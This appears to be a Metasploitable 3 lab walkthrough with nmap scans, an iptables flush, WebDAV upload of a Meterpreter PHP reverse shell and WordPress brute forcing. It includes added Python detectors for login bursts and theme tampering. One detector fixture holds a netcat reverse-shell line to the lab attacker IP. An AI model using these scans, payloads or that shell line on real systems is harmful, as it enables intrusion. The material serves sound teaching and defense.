<p>To conduct these exercises, you need two machines: one is used for attacking, the other is the victim. Using virtual machines is always the best solution for training purposes, so in the following examples a Kali Linux VM and a Metasploitable 3 VM are connected to a VirtualBox internal network with a router between the two VMs.</p>
<p>To change the settings of the Metasploitable 3 VM, just follow the normal procedure to configure network interfaces in Linux.
Besides, the VM might have some iptables rules being enforced.<p><a href="https://drive.google.com/uc?id=1D-JcUemSUIyXFvPDJyK6z-jF55e3ba3u" target="_blank"><img width="607" height="499" title="Metasploitable 3 Ubuntu IPTables" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Metasploitable 3 Ubuntu IPTables" src="https://drive.google.com/uc?id=1UHCyhJfsHr4035vnOaV9qwi_GNM-Fub6" border="0"></a><p>Having the firewall turned off from the start will allow you to get complete scan results.<p>But if you decide to attack this VM with the firewall on, turning it off could be one of the first tasks. Or you can get a shell and then create an SSH tunnel that will allow you to bypass the firewall.<p>Resetting is easily achieved with the following commands (the policy commands need a target, otherwise iptables rejects them; <b>-F</b> then flushes every rule in the filter table):<ul><li>sudo iptables --policy INPUT ACCEPT</li><li>sudo iptables --policy OUTPUT ACCEPT</li><li>sudo iptables --policy FORWARD ACCEPT</li><li>sudo iptables -F</li></ul><p><a href="https://drive.google.com/uc?id=1cVVXtJOMiTfsrjeHm3bR3huG2tKYIc0Y" target="_blank"><img width="363" height="152" title="Metasploitable 3 Ubuntu IPTables" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Metasploitable 3 Ubuntu IPTables" src="https://drive.google.com/uc?id=1M0JI6xPejFHjmk8Sj_s5ejVcl__W8oZW" border="0"></a></p><h2>Scanning and Enumerating</h2><p>The first step is to gather as much information as you can about the remote system. Use Nmap, Legion and OpenVAS to identify the open ports, running services and vulnerabilities on the target.<h3>Nmap Scan</h3><p>Nmap is used to discover hosts and services on a computer network by sending packets and analyzing the responses. Nmap provides a number of features for probing computer networks, including host discovery and service and operating system detection. 
You can run Nmap directly from the CLI, but it might be a good idea to run Nmap from within Metasploit so that the results are added to the MSF database for further analysis and later use.<p>There are many scanning possibilities, but the following choices of options balance speed with accuracy. As you add more options, you sacrifice speed in order to get better results:<ul><li><b>nmap -sS [IP Address]</b></li><li><b>nmap -sV [IP Address]</b></li><li><b>nmap -T4 -sV --version-all --osscan-guess -A [IP Address]</b></li></ul><p>Typical results:<p><a href="https://drive.google.com/uc?id=13pIfu36BVFAj1Eb1eNH9UZv-_yiN202N" target="_blank"><img width="806" height="438" title="Nmap scan initial results" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Nmap scan initial results" src="https://drive.google.com/uc?id=1J0irTHZNLHEsBCSoga8iBYJVRt6wmaVt" border="0"></a><p>However, the previous options won’t show you all the open ports, because the <b>-sV</b> scan mode for service and version detection uses the <b>nmap-services</b> database of about 2,200 well-known services.<p>Therefore, it might be a good idea to run some scans covering wider ranges of ports:<ul><li><b>nmap -sV --osscan-guess -p 1-10000 [IP Address]</b></li><li><b>nmap -T4 -sV --version-all --osscan-guess -A -p 1-10000 [IP Address]</b></li><li><b>nmap -T4 -PA -sV --version-all --osscan-guess -A -p 1-10000 [IP Address]</b></li><li><b>nmap -T4 -PA -sC -sV --version-all --osscan-guess -A -p 1-10000 [IP Address]</b></li><li><b>nmap -T4 -PA -sC -sV --version-all --osscan-guess -A -p 1-65535 [IP Address]</b></li></ul><p>and even UDP ports:<ul><li><b>nmap -sU -sV --version-all -p 1-10000 [IP Address]</b></li></ul><p>And these are the results:<p><a href="https://drive.google.com/uc?id=1d-0_WuY1DLO0MXmiJAVc99gv9HJNokS_" target="_blank"><img width="806" height="414" title="Nmap scan final results" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Nmap scan final results" src="https://drive.google.com/uc?id=1bSgU8jdOgawGLbN27WP3yZvW3WVPWyuZ" border="0"></a><p>As you can see, there are many open ports and running services on the target VM.<h3>Legion Scan</h3><p>Another easy way to get initial information on the target is to use Legion. This tool runs a number of Nmap scans and also launches several other tools to gather information about the target machine.<p>Some of the tools will immediately try to test the services found and even brute force the logins.<p><a href="https://drive.google.com/uc?id=1jFwupO7k8yjj6XzM7R3j0HLf42N8VrGZ" target="_blank"><img width="800" height="593" title="Metasploitable 3 Ubuntu Legion scan results" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Metasploitable 3 Ubuntu Legion scan results" src="https://drive.google.com/uc?id=1J2VcYTMtRgWA4T_HE4Ahc3rRf7vABfP6" border="0"></a><p>You can save the result of this scan for later usage or for a quick reference. But for proper vulnerability scanning, you will need a better tool.<h3>OpenVAS Scan</h3><p>For a comprehensive scan, try the Open Vulnerability Assessment Scanner. 
This tool has a full range of capabilities, including unauthenticated testing, authenticated testing, various high-level and low-level Internet and industrial protocols, performance tuning for large-scale scans and a powerful internal programming language to implement any type of vulnerability test.<p>It can be installed on Kali Linux and updated daily with the latest vulnerability tests.<p><a href="https://drive.google.com/uc?id=1ojtdrASaLFK-CLyRhHAR-_BI8JQXcZ-E" target="_blank"><img width="789" height="499" title="Metasploitable 3 Ubuntu OpenVAS scan results" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Metasploitable 3 Ubuntu OpenVAS scan results" src="https://drive.google.com/uc?id=1Ghlnvqx9Y7YdguxtXG8uLI4ai1_M69mT" border="0"></a><p><strong>Previous post</strong>: <a title="Metasploitable 3 Windows Walkthrough: Part X" href="https://myhackinglessons.blogspot.com/2020/11/metasploitable-3-w2k8-walkthrough-part-x.html">Metasploitable 3 Windows Walkthrough: Part X</a></p><p><strong>Metasploitable 3 Windows Walkthrough: Part X</strong> (Rui Natário, published 2020-11-06, updated 2020-11-21)</p><h2>Exploiting Port 8585 – WebDAV</h2><p>There are multiple services running on this single port.<p><a href="https://drive.google.com/uc?id=1FTArITFLOtEhTQ3CeANQ9cUzE6DDk8rv" target="_blank"><img width="552" height="499" title="Services running on Metasploitable 3 port 8585" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Services running on Metasploitable 3 port 8585" src="https://drive.google.com/uc?id=13W7rDDiKZpWKZAMjXxIGf_enxpyDrj2C" border="0"></a><p>Web Distributed Authoring and Versioning (WebDAV) is an extension of the Hypertext Transfer Protocol that allows clients to perform remote Web content authoring operations. 
In Metasploitable3, the <b><em>uploads</em></b> directory looks promising, and for now it is completely empty:</p><p><a href="https://drive.google.com/uc?id=1Y_vvfYn8POPznFrv1h0KEif3R_O2vO13" target="_blank"><img width="499" height="240" title="The uploads directory" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="The uploads directory" src="https://drive.google.com/uc?id=1v0nlsd6DMqqm6uJsKwubDO-ZC2ubv9cR" border="0"></a><h3>Enumerating WebDAV using Directory Buster</h3><p>Directory Buster (dirb) is a nice tool that brute forces directory names on a web server.<p><a href="https://drive.google.com/uc?id=1rHlLr_RlTUd_orwT1-NjDZ2wl_33X-IA" target="_blank"><img width="512" height="121" title="Enumerating with dirb" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Enumerating with dirb" src="https://drive.google.com/uc?id=1n9bchtME53vfg0WKi9WFDMKL1pfVc7MH" border="0"></a><p><a href="https://drive.google.com/uc?id=1maWBtfelPsxygV1IR7TPwIZ4CloCrSz2" target="_blank"><img width="516" height="68" title="Enumerating with dirb" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Enumerating with dirb" src="https://drive.google.com/uc?id=1AC-gJl_ossx-PjfUr-5R89wvAVy_xril" border="0"></a><p>Now you can use several methods to determine whether you are allowed to upload files to this directory with the HTTP PUT method.<h3>Enumerating WebDAV using Nmap</h3><p><a href="https://drive.google.com/uc?id=1gl3pT6Db6eLpu06gQdlFVhRCZoSj_ITo" target="_blank"><img width="806" height="263" title="Enumerating with nmap" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Enumerating with nmap" src="https://drive.google.com/uc?id=1t_KxZ8XjbNMdmK6zQ4Lqf3GosczDouIh" border="0"></a></p><p><a href="https://drive.google.com/uc?id=1C0Y2OmKD7XuJE1MmEvPNN2czsa5OgXrt" target="_blank"><img width="806" height="237" title="Enumerating with nmap" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Enumerating with nmap" src="https://drive.google.com/uc?id=1TPBoufD8B34phW1RuPosSERfJwbt5CyM" border="0"></a><p>As you can see, the web server allows you to upload files to the uploads directory and even to delete files.<h3>Enumerating WebDAV using Nikto</h3><p>You can also use this web vulnerability scanner to identify features of the web server. If the <strong><em>HTTP PUT</em></strong> method is enabled, Nikto reports it as follows:<p><a href="https://drive.google.com/uc?id=1fiPMyxXL20nmTBQm0-sfWpxgmoNnVBe6" target="_blank"><img width="806" height="339" title="Enumerating with Nikto" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Enumerating with Nikto" src="https://drive.google.com/uc?id=179J21w-kvFtDu9V5h-2SB_gwrk14CFdy" border="0"></a><p>The last line of the Nikto output indicates that the uploads directory allows uploading files using HTTP PUT.<h3>Enumerating WebDAV using Metasploit</h3><p>Using Metasploit you can also do WebDAV enumeration.</p><p><a href="https://drive.google.com/uc?id=1e9jdixcHu5RSa_oo1AVAuY-9oqbekQlu" target="_blank"><img width="806" height="326" title="Enumerating WebDAV with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Enumerating WebDAV with Metasploit" src="https://drive.google.com/uc?id=1G2b0X6D6UZo4DLv-Np0BlYBNaOsF75bz" border="0"></a><p>As you can see, the <b><em>uploads</em></b> directory is writable and a number of different file formats can be uploaded there.<h3>Exploiting WebDAV</h3><h4>Uploading a payload to WebDAV</h4><p>Now that you know that you can upload files to the server, the next step is creating a Meterpreter PHP reverse shell script to be deployed to the web server. 
Create the script with these parameters:<ul><li>Kali IP: 172.16.1.6</li><li>Kali port: 5555</li></ul><p><a href="https://drive.google.com/uc?id=156y8Pr8oH8x-dUrZrKmoPV0NQnQlgL63" target="_blank"><img width="806" height="125" title="Creating a payload with msfvenom" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Creating a payload with msfvenom" src="https://drive.google.com/uc?id=11r58_RleAlEsjE8CQfaZ0C8YkJBVKrqV" border="0"></a></p><p>Now set up a listener to receive the incoming connection, choosing the matching payload:<p><a href="https://drive.google.com/uc?id=177dt-aQCtUtGBjkPVw4wImvRpxJrYbC0" target="_blank"><img width="806" height="197" title="Starting a Metasploit listener" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Starting a Metasploit listener" src="https://drive.google.com/uc?id=1YW1eU-PO4PSuGGJK6H1EFIZelgfI8x6D" border="0"></a><p>Now you have multiple options to deploy the payload to the target machine.<h4>Exploiting WebDAV using Nmap</h4><p>Nmap has a script written exactly to take advantage of the HTTP PUT method. Because port 8585 is not defined as an HTTP service port in the Nmap services file, it is essential that you run a service scan with the <em><strong>-sV</strong></em> flag. 
Otherwise, the script will fail to upload the file and will only report an open port with an unknown service.<p><a href="https://drive.google.com/uc?id=1zLpngTRbspukan9H5CsIXkLEznvJo8ki" target="_blank"><img width="806" height="233" title="Uploading the payload with Nmap" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Uploading the payload with Nmap" src="https://drive.google.com/uc?id=1R088PIHDH0NxfK7SuHiItAHAFJ58JN4k" border="0"></a><p>Now, if you browse the uploads directory and click on the payload.php file, you will get a Meterpreter shell:<p><a href="https://drive.google.com/uc?id=1o-W-9QcqUN6P9oHNebkyVsxs5PDQvJ74" target="_blank"><img width="439" height="216" title="Executing the payload" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Executing the payload" src="https://drive.google.com/uc?id=1tGu2kG56GU9LMQ7zb0-Pns_VztdSb7wY" border="0"></a><p><a href="https://drive.google.com/uc?id=1bra-AaxPgNWjDDU0WWzd1Ttn-rBqz-nv" target="_blank"><img width="806" height="108" title="Meterpreter shell" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Meterpreter shell" src="https://drive.google.com/uc?id=1aWb2UK2nl4qLUakxNL89HHNrQqeg8oHT" border="0"></a><p>This is a low-privilege shell, but it’s a start.<p>Before you try some other deployment methods, close the Meterpreter session and remove the previous payload from the WebDAV server using <b>curl</b>:<p><a href="https://drive.google.com/uc?id=1paRmlCTdP-jGCmGfzf9tZjjnvubsE4-F" target="_blank"><img width="765" height="86" title="Deleting the payload with curl" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Deleting the payload with curl" src="https://drive.google.com/uc?id=1c87NQ0okoRmjHa_1ZmwCVL482I7dBfdD" border="0"></a><h4>Exploiting WebDAV using Metasploit</h4><p>You can also use the Metasploit auxiliary module HTTP PUT to upload a file to the <b><em>uploads</em></b> web directory. Use the previously created payload:<p><a href="https://drive.google.com/uc?id=1M3WbbWTL6ST_TqUfmiUo-ctIFUCEXiK-" target="_blank"><img width="806" height="394" title="Uploading the payload with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Uploading the payload with Metasploit" src="https://drive.google.com/uc?id=1LwPVKtfTfLLzvV3aQJ7GZKCFovFQCS2Y" border="0"></a><p>Metasploit reports that the upload has failed, but when we check the uploads directory on the web server we can see that the file upload did go through.<p><a href="https://drive.google.com/uc?id=1zZkAdtmH6Bnf1nlgoWaV1ur7_to70lvK" target="_blank"><img width="427" height="185" title="Executing the payload" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Executing the payload" src="https://drive.google.com/uc?id=1X1sUu-6s1CqiV0m4AeiXAWIC9RtTb6kT" border="0"></a><p>Set up the same listener as before and repeat the same procedure of browsing to and clicking the payload on the target server.<p><a href="https://drive.google.com/uc?id=1jLl9aXtWVYv_DBh4nwQmxAkCvM1y_JVh" target="_blank"><img width="806" height="211" title="Meterpreter shell" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Meterpreter shell" src="https://drive.google.com/uc?id=147B4w5RwLLj8F_cXRU-Z-lyM01rHrN_2" border="0"></a><h4>Exploiting WebDAV using curl</h4><p>You can also upload the payload using <b><em>curl</em></b>:<h5><a href="https://drive.google.com/uc?id=1o9Dkc67RfCKzzkb4HGk8BXfm3CXAbiCw" target="_blank"><img width="806" height="194" title="Uploading the payload with curl" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Uploading the payload with curl" src="https://drive.google.com/uc?id=1x7I-Sp91i-nJdvcnxfRT0aWJrX0RHCCf" border="0"></a></h5><h4>Exploiting WebDAV using cadaver</h4><p>Finally, you can also use <b>cadaver</b> to upload the file:<p><a href="https://drive.google.com/uc?id=1qeNmjhCKHQQL5sVSrX5WChFpxcA_1t22" target="_blank"><img width="806" height="131" title="Uploading the payload with cadaver" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Uploading the payload with cadaver" src="https://drive.google.com/uc?id=1aEMR5sYrgnSM9p3AzNOETODF3V9xPwUk" border="0"></a><h2>Exploiting Port 8585 – WordPress</h2><p>From the start page, if you click on the <b><em>wordpress</em></b> link under <b><em>Your Projects</em></b>, you will see the WordPress website running on the target server.<h4><a href="https://drive.google.com/uc?id=1R29UPsNB0k2U_cJZLp-u8w0QIRK1Z1OQ" target="_blank"><img width="525" height="407" title="Metasploitable 3 WordPress website" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Metasploitable 3 WordPress website" src="https://drive.google.com/uc?id=11_GOwt8ymy8WcO7WnzH09JnI7zFkcsnQ" border="0"></a></h4><p>The link to the login page will take you to <b><em>/wordpress/wp-login.php</em></b></p><p><a href="https://drive.google.com/uc?id=1EYj7j0u237Z2lrwDSHBvYHdRMH13RZuM" target="_blank"><img width="558" height="499" title="WordPress login page" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="WordPress login page" src="https://drive.google.com/uc?id=1hpeBr-D8IJYOCThKfhl7Q7jmboa1fNOW" border="0"></a><p>You already have the credentials because you’ve managed to crack the hashes before, remember? 
Anyway, forget about that and try to get them again.<h3>Brute forcing WordPress using Nmap</h3><p>Use your customized wordlists to speed up the process.<p><a href="https://drive.google.com/uc?id=1JZOoEiFhzv7p6RnB0N_gfGM9TFpupIR9" target="_blank"><img width="806" height="284" title="Brute forcing WordPress with Nmap" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Brute forcing WordPress with Nmap" src="https://drive.google.com/uc?id=1lEticusNm21t469dLlcIRdigoWsnA6tg" border="0"></a><p>You have found four valid sets of credentials.<h3>Brute forcing WordPress using Metasploit</h3><p><a href="https://drive.google.com/uc?id=1grvjrKNb_v80-4p5D7q3POKaXEJ9DNVx" target="_blank"><img width="806" height="411" title="Brute forcing WordPress with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Brute forcing WordPress with Metasploit" src="https://drive.google.com/uc?id=1wr8qYfurX2h5FLxqqZSHjxlrc3iOjPvs" border="0"></a></p><h3>Brute forcing WordPress using WPScan</h3><p><b>WPScan</b> is a powerful tool that can also be used to brute force access to a WordPress website:<p><a href="https://drive.google.com/uc?id=1OnSw0aazOPbdZ77Ct0yiOA5hLmA2j4G7" target="_blank"><img width="806" height="277" title="Brute forcing WordPress with WPScan" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Brute forcing WordPress with WPScan" src="https://drive.google.com/uc?id=1oDDzqMGom_T5-lHDw8FSkdHDPOwn-F5G" border="0"></a><p><a href="https://drive.google.com/uc?id=1iQrwmaPll1UVsKxkD04zKWtBee1ydLg9" target="_blank"><img width="806" height="180" title="Brute forcing WordPress with WPScan" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Brute forcing WordPress with WPScan" src="https://drive.google.com/uc?id=1vmLonN3J4VjHj6TxlJH2Am55K5ovcuil" border="0"></a><p>Now, with a valid login, you can access the admin page:<p><a href="https://drive.google.com/uc?id=19qd9TFTlAsWOw38ZWkVs7X38QQErS0pW" target="_blank"><img width="692" height="290" title="WordPress admin page" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="WordPress admin page" src="https://drive.google.com/uc?id=1ixaaG4yXsyettPsdPUBuwL4yBMKDgFNp" border="0"></a><p>Try to get as much information as possible about your target:</p><h3>Enumerating WordPress using Nmap</h3><p><a href="https://drive.google.com/uc?id=1iJ960Khq4CP9Zao06YHgXp7DeIK21nLw" target="_blank"><img width="806" height="298" title="Enumerating WordPress with Nmap" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Enumerating WordPress with Nmap" src="https://drive.google.com/uc?id=1v4Ss5HoHPOdOac14OWVimJ2tD-vpjLWp" border="0"></a></p><p>Important information: the installed plugins…<p><a href="https://drive.google.com/uc?id=10cb20Ub_j7cXS-Fzc3oiRiU-IlqIJlem" target="_blank"><img width="806" height="256" title="Enumerating WordPress with Nmap" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Enumerating WordPress with Nmap" src="https://drive.google.com/uc?id=1iCQm1tDGJ3FEyEYtNbsM6lR8n9YSQjIF" border="0"></a><p><b><em>NOTE</em></b>: Pay attention to the syntax of the NSE scripts. 
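<p>Seen from the target, the SSH brute forcing in the Ubuntu walkthrough above (Hydra, Nmap, Metasploit) and the WordPress brute forcing in this post (Nmap, Metasploit, WPScan) leave the same trace: a dense cluster of failed logins from one source address, often followed by a success. The following Python script is an added example and not code from the original post; it parses sshd lines from auth.log and Apache access-log lines for wp-login.php, then reports any source that reaches a threshold of failures inside a time window. The log lines, the year supplied for the syslog timestamps, the threshold of 5 failures in 60 seconds, and the function names are all constructed for this example; the addresses are the lab's.</p>

```python
"""Spot password-guessing bursts in sshd and WordPress login logs.

Added example, not code from the original post. The Hydra, Nmap and
Metasploit SSH runs and the Nmap, Metasploit and WPScan wp-login.php runs
described in this walkthrough each leave a dense cluster of failed logins
from one source, often followed by a success. This script parses both
log formats and reports such clusters. The log lines are constructed
samples; the source addresses are the lab's.
"""
import re
from collections import defaultdict
from datetime import datetime

# sshd lines as they appear in /var/log/auth.log (constructed sample)
SSH_LOG = """\
Nov 10 10:35:01 metasploitable3 sshd[2201]: Failed password for invalid user admin from 172.16.1.6 port 41022 ssh2
Nov 10 10:35:02 metasploitable3 sshd[2203]: Failed password for vagrant from 172.16.1.6 port 41024 ssh2
Nov 10 10:35:03 metasploitable3 sshd[2205]: Failed password for vagrant from 172.16.1.6 port 41026 ssh2
Nov 10 10:35:04 metasploitable3 sshd[2207]: Failed password for invalid user test from 172.16.1.6 port 41028 ssh2
Nov 10 10:35:05 metasploitable3 sshd[2209]: Failed password for boba_fett from 172.16.1.6 port 41030 ssh2
Nov 10 10:35:06 metasploitable3 sshd[2211]: Failed password for vagrant from 172.16.1.6 port 41032 ssh2
Nov 10 10:35:09 metasploitable3 sshd[2215]: Accepted password for vagrant from 172.16.1.6 port 41040 ssh2
Nov 10 10:40:00 metasploitable3 sshd[2300]: Accepted publickey for vagrant from 172.16.1.20 port 50000 ssh2
"""

# Apache combined-log lines for the WordPress login form (constructed sample).
# wp-login.php answers a wrong password with 200 (form shown again) and a
# correct one with a 302 redirect to wp-admin.
WP_LOG = """\
172.16.1.6 - - [10/Nov/2020:10:36:01 -0800] "POST /wordpress/wp-login.php HTTP/1.1" 200 3456 "-" "WPScan v3.8"
172.16.1.6 - - [10/Nov/2020:10:36:02 -0800] "POST /wordpress/wp-login.php HTTP/1.1" 200 3456 "-" "WPScan v3.8"
172.16.1.6 - - [10/Nov/2020:10:36:03 -0800] "POST /wordpress/wp-login.php HTTP/1.1" 200 3456 "-" "WPScan v3.8"
172.16.1.6 - - [10/Nov/2020:10:36:04 -0800] "POST /wordpress/wp-login.php HTTP/1.1" 200 3456 "-" "WPScan v3.8"
172.16.1.6 - - [10/Nov/2020:10:36:05 -0800] "POST /wordpress/wp-login.php HTTP/1.1" 200 3456 "-" "WPScan v3.8"
172.16.1.6 - - [10/Nov/2020:10:36:06 -0800] "POST /wordpress/wp-login.php HTTP/1.1" 200 3456 "-" "WPScan v3.8"
172.16.1.6 - - [10/Nov/2020:10:36:07 -0800] "POST /wordpress/wp-login.php HTTP/1.1" 302 0 "-" "WPScan v3.8"
172.16.1.20 - - [10/Nov/2020:10:50:00 -0800] "POST /wordpress/wp-login.php HTTP/1.1" 200 3456 "-" "Mozilla/5.0"
"""

SSH_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?:password|publickey) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<src>\S+) port"
)
WP_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"POST /wordpress/wp-login\.php[^"]*" (?P<status>\d{3})'
)


def parse_ssh(text, year=2020):
    """Events (service, time, source, user, success) from sshd log lines.
    syslog timestamps carry no year, so one is supplied (assumption)."""
    events = []
    for line in text.splitlines():
        m = SSH_RE.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            events.append(("ssh", ts, m["src"], m["user"], m["result"] == "Accepted"))
    return events


def parse_wp(text):
    """Events from wp-login.php POSTs; the access log does not carry the username."""
    events = []
    for line in text.splitlines():
        m = WP_RE.match(line)
        if m:
            # drop the UTC offset so the time compares with the naive syslog time
            ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z").replace(tzinfo=None)
            events.append(("wordpress", ts, m["src"], None, m["status"] == "302"))
    return events


def detect_bursts(events, threshold=5, window_seconds=60):
    """One finding per (service, source) that reaches `threshold` failures
    inside any `window_seconds` span, noting whether a success followed."""
    by_key = defaultdict(list)
    for ev in sorted(events, key=lambda e: e[1]):
        by_key[(ev[0], ev[2])].append(ev)
    findings = []
    for (service, src), evs in sorted(by_key.items()):
        fails = [e for e in evs if not e[4]]
        peak, start = 0, 0
        for end in range(len(fails)):  # sliding window over the failures
            while (fails[end][1] - fails[start][1]).total_seconds() > window_seconds:
                start += 1
            peak = max(peak, end - start + 1)
        if peak < threshold:
            continue
        findings.append({
            "service": service,
            "source": src,
            "failures": len(fails),
            "peak_in_window": peak,
            "users_tried": sorted({e[3] for e in fails if e[3]}),
            # a success from a source that was guessing is the urgent case
            "success_after_burst": any(e[4] and e[1] >= fails[0][1] for e in evs),
        })
    return findings


if __name__ == "__main__":
    for finding in detect_bursts(parse_ssh(SSH_LOG) + parse_wp(WP_LOG)):
        print(finding)
```

<p>On the sample data both the SSH and the WordPress runs from 172.16.1.6 are reported with <b>success_after_burst</b> set, while the single failed WordPress login from 172.16.1.20 and the key-based SSH login stay below the threshold. The same sliding-window logic is what fail2ban-style tooling applies; raising the threshold or shortening the window tunes it to the login volume of the host.</p>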
<h3>Enumerating WordPress using WPScan</h3><p>This is supposed to be the ultimate tool when it comes to getting information about any WordPress site:<p><a href="https://drive.google.com/uc?id=1-TazS9stWsapD3tt5LB3NJZaYAe7GdU7" target="_blank"><img width="806" height="52" title="Enumerating WordPress with WPScan" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Enumerating WordPress with WPScan" src="https://drive.google.com/uc?id=1Yvuc7Vifw7A0uu-KS_M1iupGt7lL0sme" border="0"></a><p><a href="https://drive.google.com/uc?id=1RDWtV-PC4S1-lte3j45-VIB_WKgT_IOX" target="_blank"><img width="806" height="83" title="Enumerating WordPress with WPScan" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Enumerating WordPress with WPScan" src="https://drive.google.com/uc?id=1I5RgKCoKi11pAC_SmfYJqryIQDveXjtH" border="0"></a><h3>Enumerating WordPress using Metasploit</h3><p>This module will enumerate the existing users and then check for valid credentials.<p><a href="https://drive.google.com/uc?id=12v8m8YHtplUH3bPH9nagaDWdjwvMWeNB" target="_blank"><img width="816" height="683" title="Enumerating WordPress with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Enumerating WordPress with Metasploit" src="https://drive.google.com/uc?id=1x4JQGMGKOoW_7Dy2hnOGcs4Wg1eJVrjp" border="0"></a><h3>Exploiting WordPress</h3><p>You can log in to the website, but what you want is a shell, right? In WordPress you can’t deploy files to the website, but you can add code to the existing pages. 
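<p>Adding code to an existing theme file through the built-in editor, as the steps below do, leaves two traces that a defender can check for: the edited file no longer matches a known-good hash manifest, and it now contains a command-execution call that a template has no reason to make. The setting that removes the editor altogether, <b>DISALLOW_FILE_EDIT</b> in wp-config.php, can be checked at the same time. The following Python script is an added example, not code from the original post or from WordPress itself; the theme files and wp-config.php fragments it writes to a temporary directory are constructed samples, the list of suspicious PHP calls is illustrative, and the function names are this example's own.</p>

```python
"""Integrity checks for a WordPress theme directory and wp-config.php.

Added example, not code from the original post. The editing step in the
walkthrough (Appearance > Editor, save a changed header.php) is detected
here in two independent ways: a hash manifest taken from a known-good copy
of the theme, and a grep for command-execution calls inside .php files.
A third check confirms that wp-config.php turns the editor off. All files
below are constructed samples written to a temporary directory.
"""
import hashlib
import os
import re
import tempfile

# PHP calls that have no business in a theme template (illustrative list)
SUSPICIOUS = re.compile(
    r"\b(shell_exec|exec|system|passthru|popen|proc_open|eval|assert|base64_decode)\s*\("
)
# define('DISALLOW_FILE_EDIT', true) in wp-config.php removes the theme/plugin editor
DISALLOW_RE = re.compile(
    r"define\(\s*['\"]DISALLOW_FILE_EDIT['\"]\s*,\s*true\s*\)", re.IGNORECASE
)


def hash_tree(root):
    """Map each file under root (path relative to root) to its SHA-256 hex digest."""
    manifest = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            with open(full, "rb") as fh:
                manifest[os.path.relpath(full, root)] = hashlib.sha256(fh.read()).hexdigest()
    return manifest


def diff_manifest(baseline, current):
    """Files whose hash changed, that appeared, or that disappeared since the baseline."""
    return {
        "changed": sorted(p for p in baseline if p in current and baseline[p] != current[p]),
        "added": sorted(p for p in current if p not in baseline),
        "removed": sorted(p for p in baseline if p not in current),
    }


def grep_suspicious(root):
    """(relative path, line number, matched call) for every hit inside a .php file."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in sorted(files):
            if not name.endswith(".php"):
                continue
            full = os.path.join(dirpath, name)
            with open(full, encoding="utf-8", errors="replace") as fh:
                for lineno, line in enumerate(fh, 1):
                    m = SUSPICIOUS.search(line)
                    if m:
                        hits.append((os.path.relpath(full, root), lineno, m.group(1)))
    return hits


def file_edit_disabled(wp_config_text):
    """True when wp-config.php disables the built-in file editor."""
    return DISALLOW_RE.search(wp_config_text) is not None


# Constructed theme template, before and after the edit made in the walkthrough
CLEAN_HEADER = "<?php\n/** The header template */\n?>\n<!DOCTYPE html>\n<html <?php language_attributes(); ?>>\n"
INJECTED_HEADER = '<?php echo shell_exec("nc.exe 172.16.1.6 5555 -e cmd.exe"); ?>\n' + CLEAN_HEADER


def demo():
    """Write a clean theme, take a baseline, tamper with it, and run all three checks."""
    with tempfile.TemporaryDirectory() as theme:
        with open(os.path.join(theme, "header.php"), "w") as fh:
            fh.write(CLEAN_HEADER)
        with open(os.path.join(theme, "style.css"), "w") as fh:
            fh.write("/* Theme Name: Sample */\n")
        baseline = hash_tree(theme)
        clean_hits = grep_suspicious(theme)
        with open(os.path.join(theme, "header.php"), "w") as fh:  # the tampering
            fh.write(INJECTED_HEADER)
        return {
            "clean_hits": clean_hits,
            "diff": diff_manifest(baseline, hash_tree(theme)),
            "hits": grep_suspicious(theme),
            "editor_disabled_default": file_edit_disabled("<?php\ndefine('DB_NAME', 'wordpress');\n"),
            "editor_disabled_hardened": file_edit_disabled("<?php\ndefine( 'DISALLOW_FILE_EDIT', true );\n"),
        }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

<p>The manifest check is the one to rely on: it catches any edit, not only the calls on the grep list, provided the baseline was taken from a copy of the theme obtained outside the server. The grep is a quick triage aid for a server with no baseline.</p>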
